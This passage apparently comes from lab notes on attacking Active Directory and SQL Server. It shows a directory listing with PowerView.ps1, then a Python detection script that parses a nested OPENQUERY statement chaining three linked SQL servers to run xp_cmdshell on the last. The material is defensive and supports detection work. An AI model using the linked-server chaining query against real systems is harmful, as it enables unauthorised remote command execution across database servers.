Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d----- 3/6/2024 7:18 AM test
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
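As an added example (not from the original notes), the following Python does what a detection rule over captured statement text (SQL Audit or Extended Events `sql_statement_completed` payloads) would do with the nested OPENQUERY above: recover the linked-server hop chain in traversal order, the nesting depth, and whether xp_cmdshell appears at any depth. The page's own query is used as the positive case and a constructed single-hop version-check as the benign one; the regexes and function names are the example's. Matching is done on the raw text, so the quote doubling ('' and '''') that grows with each hop does not matter to the rule.

```python
import re
from typing import List, Tuple

# First argument of OPENQUERY, written as "name", [name] or a bare identifier.
_OPENQUERY = re.compile(
    r'OPENQUERY\s*\(\s*(?:"([^"]+)"|\[([^\]]+)\]|([A-Za-z0-9_.$-]+))', re.IGNORECASE)
_CMDSHELL = re.compile(r"xp_cmdshell", re.IGNORECASE)

# The page's query (positive case) and a constructed benign single-hop query.
PAGE_QUERY = r"""select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')"""
BENIGN_QUERY = "select * from openquery([dcorp-sql1], 'select @@version as version')"


def hop_chain(statement: str) -> List[str]:
    """Linked-server names in the order the statement traverses them."""
    return [next(g for g in m.groups() if g) for m in _OPENQUERY.finditer(statement)]


def assess(statement: str) -> Tuple[List[str], int, bool]:
    """(chain, depth, uses_xp_cmdshell) for one captured statement."""
    chain = hop_chain(statement)
    return chain, len(chain), bool(_CMDSHELL.search(statement))


def findings(statement: str) -> List[str]:
    """Human-readable reasons to alert; empty when nothing stands out."""
    chain, depth, cmdshell = assess(statement)
    out = []
    if depth > 1:
        out.append(f"multi-hop linked-server chain ({depth} hops): {' -> '.join(chain)}")
    if cmdshell:
        out.append("xp_cmdshell invoked" + (f" on {chain[-1]}" if chain else " locally"))
    return out


if __name__ == "__main__":
    for q in (PAGE_QUERY, BENIGN_QUERY):
        print(findings(q) or ["no findings"])
```

The useful property for a detection engineer is that the last element of the chain is the server where the command actually runs (eu-sql37.eu.eurocorp.local), while the statement itself is only ever seen by the first server (dcorp-mssql); auditing on the target alone would show a query arriving from its inbound link login, not from the original domain user.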